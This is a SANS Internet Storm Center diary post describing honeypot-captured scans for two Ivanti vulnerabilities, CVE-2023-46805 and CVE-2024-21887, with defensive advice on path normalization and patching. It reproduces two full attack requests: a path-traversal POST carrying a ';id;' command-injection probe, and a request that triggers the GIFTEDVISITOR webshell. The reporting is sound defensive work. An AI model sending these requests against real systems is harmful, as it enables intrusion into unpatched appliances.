Two currently (old) exploited Ivanti vulnerabilities

    Published: 2024-10-27. Last Updated: 2024-10-27 19:04:42 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Ivanti products have given us a rich corpus of vulnerabilities in recent months (years). Of course, we do see occasional scans attempting to exploit them. Just today, I spotted two of them. None of them is particularly new, but a reminder to keep patching (or disabling):

    CVE-2023-46805 and CVE-2024-21887 "tests"

    POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection HTTP/1.1
    Host: [honeypot IP address]:9001
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-Length: 16
    Content-Type: application/json
     

    {"type": ";id;"}

    This is a very typical authentication or access control bypass taking advantage of a directory traversal vulnerability. The first part of the URL, "/api/v1/totp/user-backup-code/" is accessible by anybody as it may be used as part of the authentication process. This URL "masks" the latter half that points to confidential information. Always normalize your paths before applying access control rules.

    The purpose of the exploit is to detect if your system is vulnerable. This will not cause any "damage" aside from leaking information if you are vulnerable. However, the more severe issue is that an actual exploit attempt will likely follow it up.

    POST /api/v1/cav/client/visits HTTP/1.1
    Host: [honeypot IP address]:5986
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Connection: close
    Content-Length: 13
    Accept: */*
    Accept-Language: en
    Content-Type: text/xml
    Accept-Encoding: gzip

    GIFTEDVISITOR

    Another exploit taking advantage of the two vulnerabilities mentioned above. This request attempts to trigger a webshell that Volexity calls "GIFTEDVISITOR" based on the string used to trigger it. Volexity wrote about this back in January [1]. It's sad that attackers still think it is worthwhile scanning for this.

    [1] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords:
    0 comment(s)

      Comments

      Login here to join the discussion.


      Diary Archives